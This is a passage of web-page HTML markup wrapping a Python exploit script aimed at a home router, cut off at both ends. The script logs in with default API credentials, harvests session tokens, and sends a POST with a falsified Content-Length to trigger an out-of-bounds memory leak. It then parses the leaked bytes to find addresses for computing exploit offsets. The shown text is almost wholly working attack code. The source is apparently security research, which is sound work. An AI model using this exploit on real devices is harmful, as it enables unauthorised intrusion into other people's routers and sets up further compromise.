id=\"crayon-5a4d56ec46cab185395022-18\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">connect<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">routerIP<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">routerPort<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-19\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-22\"><span class=\"crayon-p\">########################################################<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-23\"><span class=\"crayon-p\"># Log In (using default usr and pass&#8230;) and get PI and cfgId<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-24\"><span class=\"crayon-p\">########################################################<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-26\"><span class=\"crayon-p\"># 1. Log In<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-27\"><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">autoconnect<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-28\"><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sendall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-s\">&#8216;POST \/login.cgi HTTP\/1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-29\"><span class=\"crayon-s\">Host: 192.168.1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-30\"><span class=\"crayon-s\">Proxy-Connection: keep-alive<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-31\"><span class=\"crayon-s\">Content-Length: 29<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-32\"><span class=\"crayon-s\">Origin: http:\/\/192.168.1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-33\"><span class=\"crayon-s\">User-Agent: A<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-34\"><span class=\"crayon-s\">Content-Type: text\/plain;charset=UTF-8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-35\"><span class=\"crayon-s\">Accept: *\/*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-36\"><span class=\"crayon-s\">Referer: http:\/\/192.168.1.1\/top.htm<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-37\"><span class=\"crayon-s\">Accept-Encoding: gzip, deflate<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-38\"><span class=\"crayon-s\">Accept-Language: es,en;q=0.8,gl;q=0.6<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-39\"><span class=\"crayon-s\">Cookie: menu_sel=0; menu_adv=0; defpg=status%2Ehtm; urn=<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-41\"><span class=\"crayon-s\">GO=&amp;usr=ApiUsr&amp;pws=ApiUsrPass&#8217;<\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-42\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-43\"><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-45\"><span class=\"crayon-p\"># Get URN (necessary cookie)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-46\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">routerIP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">routerPort<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;\/status.htm&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-47\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-48\"><span class=\"crayon-v\">URN<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;new_urn = &#8216;([a-zA-Z0-9]+)'&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-49\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] URN:&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URN<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-51\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Logged in&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-52\"><span class=\"crayon-e\">raw_input<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Are you sure you want to continue? Press Enter to continue.&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-53\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Getting PI and cfgId&#8230;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-54\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-55\"><span class=\"crayon-p\"># 2. get PI<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-56\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">routerIP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;\/cgi\/renewPi.js&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;urn&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">URN<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-57\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-58\"><span class=\"crayon-v\">pi<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">r<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-59\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] PI: &#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pi<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-60\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-61\"><span class=\"crayon-p\"># 3. get cfgId<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-62\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">routerIP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">routerPort<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;\/cgi\/cgi_sys_smtp.js&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;urn&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">URN<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-63\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-64\"><span class=\"crayon-v\">cfgId<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">find<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;to&#8221;,&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-65\"><span class=\"crayon-v\">cfgId<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cfgId<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">cfgId<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">find<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;,&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-66\"><span class=\"crayon-p\"># s.close()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-67\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] cfgId: &#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cfgId<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-68\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-69\"><span class=\"crayon-p\">########################################################<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-70\"><span class=\"crayon-p\"># Exploit memory leak on email out-of-bound copy on strncpy; which uses Content-Length<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-71\"><span class=\"crayon-p\">########################################################<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-72\"><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-73\"><span class=\"crayon-v\">dd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;A&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-74\"><span class=\"crayon-v\">padding<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;A&#8221;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-i\">i<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-75\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Trying with&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;bytes of padding..&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-76\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Request<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;POST&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;http:\/\/&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">routerIP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;:&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">routerPort<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/apply.cgi&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;pi=&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pi<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;&amp;&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">padding<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;&amp;SET0=&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cfgId<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;%3D&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;urn&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">URN<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-77\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">prepare<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-78\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;Content-Length&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">90<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-79\"><span class=\"crayon-v\">sess<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Session<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-80\"><span class=\"crayon-v\">sess<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">send<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-81\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-82\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Memory leak exploited&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-83\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-84\"><span class=\"crayon-p\">#######################################################<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-85\"><span class=\"crayon-p\"># Get the leaked memory address<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-86\"><span class=\"crayon-p\">########################################################<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-87\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">routerIP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">routerPort<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;\/cgi\/cgi_sys_smtp.js&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stream<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;urn&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">URN<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-88\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">unquote<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">raw<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-89\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">rfind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;sendto = &#8220;A&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-90\"><span class=\"crayon-v\">hexdump<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">hexdump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-91\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-92\"><span class=\"crayon-p\"># Check if the address we leaked is the address we need to calculate offsets<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-93\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">rfind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;xd8&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">rfind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;x77&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">or<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">rfind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;x76&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-94\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\"># the end of the address must be 0xdc and the start 0x77 or 0x76<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-95\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">addressFound<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-96\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">end_leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">rfind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;xd8&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-97\"><span class=\"crayon-i\">elif<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">rfind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;xf0&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">rfind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;x77&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span 